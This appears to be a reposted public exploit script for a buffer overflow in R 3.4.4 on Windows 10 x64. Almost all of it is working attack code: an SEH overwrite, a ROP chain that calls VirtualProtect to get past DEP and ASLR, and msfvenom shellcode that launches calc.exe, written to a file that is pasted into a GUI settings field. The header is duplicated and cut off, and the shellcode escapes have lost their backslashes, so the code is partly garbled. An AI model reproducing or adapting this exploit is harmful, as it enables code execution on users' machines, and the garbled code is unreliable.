R 3.4.4 Windows 10 x64 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 264

#!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www. #!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo

# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
import struct

outfile = 'payload.txt'

def create_rop_chain():
rop_gadgets = [
0x6c998f58, # POP EAX # RETN [R.dll]
0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
0x64c46010, # &Writable location [methods.dll]
0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0xffffffc0, # Value to negate, will become 0x00000040
0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
0xfffffdff, # Value to negate, will become 0x00000201
0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x41414141, # Filler (compensate)
0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x6ca2a9bd, # & jmp esp [R.dll]
0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
0x90909090, # nop
0x6ca00e93, # POP EDI # RETN [R.dll]
0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]
]

return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

junk = "A" * 1016

seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} : # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b 'x00x09x0ax0d' cmd=calc.exe exitfunc=thread -f python

nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode = ""
shellcode += "x90" * 20
shellcode += "xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29"
shellcode += "xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca"
shellcode += "xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca"
shellcode += "x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2"
shellcode += "x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17"
shellcode += "x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59"
shellcode += "xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1"
shellcode += "xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf"
shellcode += "x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82"
shellcode += "x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5"
shellcode += "x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4"
shellcode += "xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20"
shellcode += "x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d"
shellcode += "x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee"
shellcode += "x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9"
shellcode += "x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a"
shellcode += "x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d"

padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
file.write(payload)
print "payload File Created "